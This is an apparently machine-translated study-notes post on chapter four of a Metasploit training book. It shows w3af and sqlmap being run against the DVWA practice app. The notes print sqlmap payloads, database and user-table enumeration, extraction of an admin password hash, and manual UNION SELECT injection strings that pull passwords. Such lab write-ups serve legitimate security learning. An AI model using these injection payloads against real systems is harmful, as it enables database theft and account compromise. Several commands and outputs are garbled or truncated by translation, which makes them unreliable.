The fourth chapter of the Metasploit Devil Training Camp (top)

Last Update:2016-02-24 Source: Internet

Author: User

Tags md5 encryption

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

p128 WMAP

Like yesterday, I use these vulnerability scanning tools to sweep testfire.net or OWASPBWA can not sweep the loopholes! Don't understand!

Added: The network did not know when it broke. The scan was successful after the connection:

p134 Scan Magic W3af

# W3AF_CONSOLEW3AF>>>PLUGINSW3AF/plugins>>>bruteforce Form_auth W3af/plugins>>>bruteforce config Form_auth w3af/plugins/bruteforce/config:form_auth>>> Set passwdfile/usr/share/w3af/w3af/core/controllers/bruteforce/passwords.txt W3af/plugins/bruteforce/config:form_auth>>> Set usersfile/usr/share/w3af/w3af/core/controllers/bruteforce/Users.txt W3af/plugins/bruteforce/config:form_auth>>>BACKW3AF/plugins>>>Audit XSS Sqli
W3AF/plugins>>>Discovery webspiderunknown Command'Discovery'W3AF/plugins>>> Help|-----------------------------------------------------------------------------|| List |                                  List available plugins. || -----------------------------------------------------------------------------|| Back |                                 Go to the previous menu. || Exit |                                               Exit W3af. || -----------------------------------------------------------------------------|| Audit | View, configure and enable Audit Plugins | | Infrastructure | View, configure and enable Infrastructure Plugins | |grep| View, configure and enablegrepPlugins | | Crawl | View, configure and enable crawl Plugins | | Evasion | View, configure and enable evasion plugins | | Bruteforce | View, configure and enable Bruteforce plugins | | Auth | View, configure and enable Auth plugins | | Output | View, configure and enable output plugins | | mangle | View, configure and enable Mangle plugins | | -----------------------------------------------------------------------------|

It seems that the discovery module is not in the book. Check online, Discovery module changed to crawl module. Go on:

W3af/plugins>>> Crawl web_spider w3af/plugins>>> crawl config web_spider w3af/ Plugins/crawl/config:web_spider>>> set Only_forward True w3af/plugins/crawl/config:web_spider >>> backthe Configuration had been saved.w3af/plugins>>> back

Basic function Configuration Complete! Continue to configure the target and result storage forms for the scan:

w3af>>> targetw3af/config:target>>> set Target http://www.dvssc.com/dvwa/ index.phpw3af/config:target>>> backthe configuration has been saved.w3af>>>  PLUGINSW3AF/plugins>>> output html_file w3af/plugins>>> output config html_file W3AF/plugins/output/config:html_file>>> set verbose True w3af/plugins/output/config:html_ File>>> backthe configuration has been saved.w3af/plugins>>> back
W3af>>> Star

Sweep to Result:

p137 SQL Injection Vulnerability detection

In the Kali 2.0

MSF > Use auxiliary/scanner/http/sqlmap[–] Failed to load Module:auxiliary/scanner/http/sqlmap

It seems that the module has been deleted. Simply use the Sqlmap directly within the terminal.

Install a Firefox plugin, called Tamper Data, that can be used to view and change parameters that the Web app submits in the background, such as post parameters, cookie values, and so on.

By injecting the SQL injection training page that is logged in as admin to dvssc.com.

Submit arbitrary data, use tamper data to intercept URLs and cookies, and then use

' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit# ' --cookie='security=low; Phpsessid=ov3jmigsemo6d47367co53qq24'

Get results:

Parameter:ID(GET) Type:boolean-based Blind Title:or boolean-based Blind-WHERE or HAVING clause (MySQL comment) Payload:ID=-3209'OR 1543=1543#&submit=submitType:error-based Title:mysql OR error-based-WHERE or HAVING clause Payload:ID=-3023'OR 1 GROUP by CONCAT (0x7178716a71, (SELECT (4203=4203 and then 1 ELSE 0 END)), 0x7178627671,floor (RAND (0))) H AVING MIN (0) #&submit=submitType:and/or Time-based Blind Title:mysql>=5.0. Aand Time-based Blind (SELECT-comment) Payload:ID=a'and (SELECT * FROM (SELECT (SLEEP (5))) fhge) #&submit=submittype:union Query title:mysql UNION query (NULL)-2columns Payload:ID=a'UNION all SELECT CONCAT (0x7178716a71, 0x4e4b7872695163554f65444d6e4a4f59764f54616879767062516e576373624d726e545a6b727472,0x7178627671),NULL#& Submit=submit---[ A: +: the] [INFO] the back-End DBMS is mysqlweb server operating system:linux Ubuntu10.04(Lucid Lynx) Web application technology:php5.3.2Apache2.2. - Back-end Dbms:mysql5.0. A[ A: +: the] [INFO] fetched data logged to text files under'/root/.sqlmap/output/www.dvssc.com'[*] shutting down at A: +: the

Next, explore the database name in MySQL that holds the web app data. Simply add--dbs (probe database name) and-V 0 (verbose level) at the end of the previous command:

' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit# ' --cookie='security=low; Phpsessid=ov3jmigsemo6d47367co53qq24'0--snip--available databases [2 ]:[*] dvwa[*] information_schema[::

INFORMATION_SCHEMA is the default system database for MySQL, so let's focus on DVWA and probe the table names that exist:

# Sqlmap-u'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#'--cookie='Security=low; Phpsessid=ov3jmigsemo6d47367co53qq24'-D DVWA--Tables--snip--[ A: *: Wu] [INFO] fetching tables forDatabase'Dvwa'[ A: *: Wu] [WARNING] reflective value (s) found and filtering outdatabase:dvwa[2Tables]+-----------+| Guestbook | | Users |+-----------+

Probe the list of fields in users and discover that there is a password, haha! Get the contents out:

 # sqlmap-u  " http://www.dvssc.com/dvwa/ vulnerabilities/sqli/?id=bb&submit=submit#   "--cookie= '

View Users.csv, inside the password of the admin through MD5 encryption, Google will know the password is the admin.

p150 SQL injection Instance Analysis

To log in to Www.dvssc.com's SQL injection training interface, first set the security level to a minimum.

When using union injection, if the number of columns is different from the actual table, the error is:

such as injecting

' UNION SELECT 1,2,3-- '

Error

SELECT  Number  of columns

Continue, by querying the INFORMATION_SCHEMA system table, you can see the name of each table in the MySQL database and the name of each column, and so on:

'(the last comment symbol--and ' There's a space between the lines! ）
' UNION SELECT 1, column_name from Information_schema.column WHERE table_name= ' users '--'
' UNION SELECT 1, password from users-'
' UNION SELECT password, concat (first_name, ', last_name, ', user) from users--' (Through the concat () function to get more information)

The fourth chapter of the Metasploit Devil Training Camp (top)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More